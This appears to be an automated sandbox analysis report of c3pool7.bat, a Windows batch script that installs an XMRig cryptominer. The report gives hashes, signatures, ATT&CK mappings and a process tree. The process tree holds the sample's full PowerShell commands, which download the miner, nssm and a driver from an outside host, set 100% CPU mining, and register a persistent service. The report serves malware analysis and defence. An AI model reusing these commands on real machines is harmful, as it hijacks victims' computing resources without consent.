Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-08-2023 23:02

General

  • Target

    c3pool7.bat

  • Size

    4KB

  • MD5

    13e899d46060ac8afdf5f6cf24bee4cd

  • SHA1

    28750ce262bd03b0b64c088b2c6c5f9f36318f69

  • SHA256

    7ade6efc0209cfdf8ed8bfa290fefec1d377ebb999aed6fcdb2eab91cc61105f

  • SHA512

    8ee8f1df3f83eb456637d33f2bac494e1076320c839b1c52bcd12edd7096560b4ae218aed3403e9d71566da395574103ccd24127321d4b1450050ec53caaedba

  • SSDEEP

    96:djt+DMVGW8Zc44KVFZo2ZIr0yJ4im+Q39IvMV6kI:d2EPCc44aX2gO4iu3iO6kI

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe

Signatures

  • XMRig Miner payload 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 8 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c3pool7.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3816
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', 'C:\Users\Admin\c3pool\xmrig.exe')"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', 'C:\Users\Admin\c3pool\nssm.exe')"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2608
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2968
          • C:\Windows\system32\HOSTNAME.EXE
            "C:\Windows\system32\HOSTNAME.EXE"
            4⤵
              PID:1964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"pass\": *\".*\",', '\"pass\": \"Bihqjrxs\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\c3pool\\xmrig.log\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4768
        • C:\Windows\system32\sc.exe
          sc stop c3pool_miner
          2⤵
          • Launches sc.exe
          PID:768
        • C:\Windows\system32\sc.exe
          sc delete c3pool_miner
          2⤵
          • Launches sc.exe
          PID:4956
        • C:\Users\Admin\c3pool\nssm.exe
          "C:\Users\Admin\c3pool\nssm.exe" install c3pool_miner "C:\Users\Admin\c3pool\xmrig.exe"
          2⤵
          • Executes dropped EXE
          PID:5012
        • C:\Users\Admin\c3pool\nssm.exe
          "C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppDirectory "C:\Users\Admin\c3pool"
          2⤵
          • Executes dropped EXE
          PID:1608
        • C:\Users\Admin\c3pool\nssm.exe
          "C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
          2⤵
          • Executes dropped EXE
          PID:3400
        • C:\Users\Admin\c3pool\nssm.exe
          "C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppStdout "C:\Users\Admin\c3pool\stdout"
          2⤵
          • Executes dropped EXE
          PID:2252
        • C:\Users\Admin\c3pool\nssm.exe
          "C:\Users\Admin\c3pool\nssm.exe" set c3pool_miner AppStderr "C:\Users\Admin\c3pool\stderr"
          2⤵
          • Executes dropped EXE
          PID:3300
        • C:\Users\Admin\c3pool\nssm.exe
          "C:\Users\Admin\c3pool\nssm.exe" start c3pool_miner
          2⤵
          • Executes dropped EXE
          PID:3056
      • C:\Users\Admin\c3pool\nssm.exe
        C:\Users\Admin\c3pool\nssm.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4792
        • C:\Users\Admin\c3pool\xmrig.exe
          "C:\Users\Admin\c3pool\xmrig.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2092
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:496

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Persistence

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Privilege Escalation

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Defense Evasion

        Impair Defenses

        1
        T1562

        Impact

        Service Stop

        1
        T1489

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          08f9f3eb63ff567d1ee2a25e9bbf18f0

          SHA1

          6bf06056d1bb14c183490caf950e29ac9d73643a

          SHA256

          82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

          SHA512

          425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          7c9011df9a737a3a07ab50a698e39a5c

          SHA1

          7c8e0549998a98a0b58fbaf4eda5113fc3d16408

          SHA256

          ce8b177dad70003e81dbec303be2396c7efd55671462c119b263f7981b2d29e1

          SHA512

          1e86b5618e63078e66770f925001316b527ba554185e00ee8abbe073f7940ad0aa65d8f145fde4adf42df47dcfa19988852690a6bb5b173ddb87325e0bd25972

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          4ddf2d035dbfcad64f580a49b10efa2c

          SHA1

          6ebfc2bdd89c1a4d101c8ececaf7b652286231f7

          SHA256

          cb674e00f038e01e0b4768ef1cfabafad18ec1638210f2807906621dd69adf7f

          SHA512

          92758b20f903d06e5b08fbd808cd51b1eefaa69f1d537aa6d90be31fa4dffcae3eb0137671b31e9c2eb173e77108aeb824e2b8c73ca9ba29329a7e022804f678

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          472bb912e20c472c4cef2711d13832e5

          SHA1

          281d31d013a923390dedf5b93674b0f2d2246ccb

          SHA256

          5205563867c082d9edea0e6eb240e775ebc3ac33f880906fab8ad8768edae6da

          SHA512

          b89871a3fc90b93f0ab20919da0d488b19279554090506569187b0600375ed8f249c733043fa6c67d32674f969b3cc4aa353f0b2d2d447cdebfcd4c45bc21984

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          dcff3a757f7a69d5918a6ed3bfc5b90d

          SHA1

          9b7e3ce589b1b828ccf798b580d45c1063285dc7

          SHA256

          e1f8709eaed424d24aab14420546270d41773c247300cf05fdf7db61ac02758b

          SHA512

          41b0a3f72d1fc40b994326336499c902051fccf6912c003c44d9fc477c15c9ccc5e610a8bf02810742ca3aad8c0c8aec0c8a17264444b4ca79ef715f5c9157f0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          5b5352c55a8e79ac8de4be3202d496a1

          SHA1

          4a263d9e36e5ef972e4b19035cae169e1df6459c

          SHA256

          eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

          SHA512

          c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          aac67ecfb42c2b7a025c59dbdc8fa179

          SHA1

          d6a0fab18fae72a286fecdab0f1dc93deb223f5b

          SHA256

          60af0f1ad08b2b542efb8f58341b5966f4083b7757f94b6e82af81d963a58456

          SHA512

          918e27ab0d3765f32cdd1b2eaf87ed8eb0a3f68717ae40106d164073ef69b68e4e7de003c05e86e900b411f12a53381c67e9210a56a76f91888f073bad832a8e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          7ea44c4cce79deb71db51c21a8e91a26

          SHA1

          e627da1b11679a2af109378874ba352628adb197

          SHA256

          ee76657d1e711664363773cdbfbaa9b4068615a6e3aee41e5e4d7b985578172b

          SHA512

          63ec12b2ba510c9deeed2d9653fad178d88d611324b554716681c26a1bce992b90b270f23f27d122ed7ddbe9565d15f21e42afd80594fbe272e20dadcfe64049

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          08467459be04ee5bb1d7eb4f676342dd

          SHA1

          7b1a81ef6ee958c94879f31d5a8ba895f2117421

          SHA256

          714e704c29f9d10d2e9e686d4747974c1d1a7a84a00f7e1d1b1541809c1e9fe7

          SHA512

          f5811c708e079633d6d6b8de03843fa2ff810979e6de70db370868d96b98a9106765aac0984fdb7aa25cd4901d52b1f7514edb6dc8e6208d17f0a5908eac1d7a

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3smhjno.2wh.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\c3pool\config.json
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • C:\Users\Admin\c3pool\config.json
          Filesize

          2KB

          MD5

          271725884633ca8821344e5dc383a2dd

          SHA1

          6264bfcca652e38e2898c683ca767fb0d528c86b

          SHA256

          3fca72bf0274b36947bc25c93df4b9f62673f4c01c98469b9f3c28f7ffb363eb

          SHA512

          5798630835dac7b0fd5b38e9080dd6a00e39ca91d301ba2487634653d7b17689ca35dd81ac18c468278dd1dee1f2d05b5fd977a5314b84b83262d6ccb6a789d4

        • C:\Users\Admin\c3pool\config.json
          Filesize

          2KB

          MD5

          271725884633ca8821344e5dc383a2dd

          SHA1

          6264bfcca652e38e2898c683ca767fb0d528c86b

          SHA256

          3fca72bf0274b36947bc25c93df4b9f62673f4c01c98469b9f3c28f7ffb363eb

          SHA512

          5798630835dac7b0fd5b38e9080dd6a00e39ca91d301ba2487634653d7b17689ca35dd81ac18c468278dd1dee1f2d05b5fd977a5314b84b83262d6ccb6a789d4

        • C:\Users\Admin\c3pool\config.json
          Filesize

          2KB

          MD5

          b63ea796dfffcdd49eba0a8261dcb8b8

          SHA1

          49bbd24a4f31946b0baf93a0e6e6206596969395

          SHA256

          b39a0acd36726dae85b0dae9c5c0615b18c600a9b71f9575f1edb085457c82e3

          SHA512

          37486a23bca35616c2480a5f416d7cbe61ecb21e2eacc42b042617f637f6cb70999ee872a46bb8e3f8ea5c9837fd3e14c26b84070d6fd0f06a15ce3b5bd975ff

        • C:\Users\Admin\c3pool\config.json
          Filesize

          2KB

          MD5

          9a45a490d6b71bff29febc5aee757bb0

          SHA1

          2ddb049db7891bfd36231a599e98e02c62456079

          SHA256

          401e5ed981002b4bce423a7ec1cfa84253713e6677ae4c04f1e3ba2559b430ff

          SHA512

          481381147a27b1f4225ce4a599ea04d164ecf04da7ad80bc67fd3cf6a1acd770fb83858fc7d617c439c6593ec5ccc7237a53cf19bc1c77060f585496efff3082

        • C:\Users\Admin\c3pool\config.json
          Filesize

          3KB

          MD5

          efdbb35e24265e4d391c8af113bb337f

          SHA1

          31a672d72bf9adfda300b4637763bbd5366c4ba2

          SHA256

          def23946f6218e8b24cfe40a4ebdb11dc38182e7dba5021abf3e5a1f2aa3dc4c

          SHA512

          949b9b300938bc0f221f936fbd699f64080a70f498654a618f47bf50b223103bfaea2a28e69bec6bfeef5b5aeb893825c4b2f951c77e08d67ea1ae4eb3702993

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\nssm.exe
          Filesize

          360KB

          MD5

          1136efb1a46d1f2d508162387f30dc4d

          SHA1

          f280858dcfefabc1a9a006a57f6b266a5d1fde8e

          SHA256

          eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

          SHA512

          43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

        • C:\Users\Admin\c3pool\xmrig.exe
          Filesize

          5.3MB

          MD5

          93655baf77e96e0a513285a426ba608f

          SHA1

          4eba35b80dba05974b460ff3bff13478cc8a382b

          SHA256

          228328ca683a5eda547a57d37c5ef76bb3ae6f9530346b6280e5236bc1d05ed7

          SHA512

          bc531a825ae62e0f0c22af5d149d5195bf091319feb4e4409d20efb9d6abf1fe7b600100f4cf0acfe5b3709bffc92cf439a167b4514542413ad251852abfc91c

        • C:\Users\Admin\c3pool\xmrig.exe
          Filesize

          5.3MB

          MD5

          93655baf77e96e0a513285a426ba608f

          SHA1

          4eba35b80dba05974b460ff3bff13478cc8a382b

          SHA256

          228328ca683a5eda547a57d37c5ef76bb3ae6f9530346b6280e5236bc1d05ed7

          SHA512

          bc531a825ae62e0f0c22af5d149d5195bf091319feb4e4409d20efb9d6abf1fe7b600100f4cf0acfe5b3709bffc92cf439a167b4514542413ad251852abfc91c

        • memory/592-241-0x000002176B7E0000-0x000002176B7F0000-memory.dmp
          Filesize

          64KB

        • memory/592-251-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/592-246-0x000002176B7E0000-0x000002176B7F0000-memory.dmp
          Filesize

          64KB

        • memory/592-235-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/908-265-0x000001F7C19D0000-0x000001F7C19E0000-memory.dmp
          Filesize

          64KB

        • memory/908-254-0x000001F7C19D0000-0x000001F7C19E0000-memory.dmp
          Filesize

          64KB

        • memory/908-253-0x000001F7C19D0000-0x000001F7C19E0000-memory.dmp
          Filesize

          64KB

        • memory/908-269-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/908-252-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/1148-184-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/1148-181-0x00000213722A0000-0x00000213722B0000-memory.dmp
          Filesize

          64KB

        • memory/1148-174-0x00000213722A0000-0x00000213722B0000-memory.dmp
          Filesize

          64KB

        • memory/1148-170-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/1148-179-0x00000213722A0000-0x00000213722B0000-memory.dmp
          Filesize

          64KB

        • memory/1268-153-0x0000027E176E0000-0x0000027E176F0000-memory.dmp
          Filesize

          64KB

        • memory/1268-164-0x0000027E176E0000-0x0000027E176F0000-memory.dmp
          Filesize

          64KB

        • memory/1268-167-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/1268-152-0x0000027E176E0000-0x0000027E176F0000-memory.dmp
          Filesize

          64KB

        • memory/1268-151-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/1948-234-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/1948-230-0x00000202208C0000-0x00000202208D0000-memory.dmp
          Filesize

          64KB

        • memory/1948-228-0x00000202208C0000-0x00000202208D0000-memory.dmp
          Filesize

          64KB

        • memory/1948-223-0x00000202208C0000-0x00000202208D0000-memory.dmp
          Filesize

          64KB

        • memory/1948-222-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/2092-318-0x0000027E3D380000-0x0000027E3D3A0000-memory.dmp
          Filesize

          128KB

        • memory/2092-321-0x0000027E3D560000-0x0000027E3D564000-memory.dmp
          Filesize

          16KB

        • memory/2092-322-0x0000027E3D560000-0x0000027E3D564000-memory.dmp
          Filesize

          16KB

        • memory/2608-185-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/2608-200-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/2608-186-0x00000242A8720000-0x00000242A8730000-memory.dmp
          Filesize

          64KB

        • memory/2608-187-0x00000242A8720000-0x00000242A8730000-memory.dmp
          Filesize

          64KB

        • memory/2968-216-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/2968-212-0x0000025EB9CD0000-0x0000025EB9CE0000-memory.dmp
          Filesize

          64KB

        • memory/2968-210-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/2968-214-0x0000025EB9CD0000-0x0000025EB9CE0000-memory.dmp
          Filesize

          64KB

        • memory/2968-213-0x0000025EB9CD0000-0x0000025EB9CE0000-memory.dmp
          Filesize

          64KB

        • memory/3620-149-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/3620-143-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/3620-138-0x000001EA34FC0000-0x000001EA34FE2000-memory.dmp
          Filesize

          136KB

        • memory/3620-144-0x000001EA34FB0000-0x000001EA34FC0000-memory.dmp
          Filesize

          64KB

        • memory/3620-145-0x000001EA34FB0000-0x000001EA34FC0000-memory.dmp
          Filesize

          64KB

        • memory/4252-271-0x000002227AE70000-0x000002227AE80000-memory.dmp
          Filesize

          64KB

        • memory/4252-283-0x000002227AE70000-0x000002227AE80000-memory.dmp
          Filesize

          64KB

        • memory/4252-270-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/4252-277-0x000002227AE70000-0x000002227AE80000-memory.dmp
          Filesize

          64KB

        • memory/4252-287-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/4768-305-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/4768-297-0x00007FFDAA1F0000-0x00007FFDAACB1000-memory.dmp
          Filesize

          10.8MB

        • memory/4768-298-0x000001B551F80000-0x000001B551F90000-memory.dmp
          Filesize

          64KB

        • memory/4768-299-0x000001B551F80000-0x000001B551F90000-memory.dmp
          Filesize

          64KB

        • memory/4768-301-0x000001B551F80000-0x000001B551F90000-memory.dmp
          Filesize

          64KB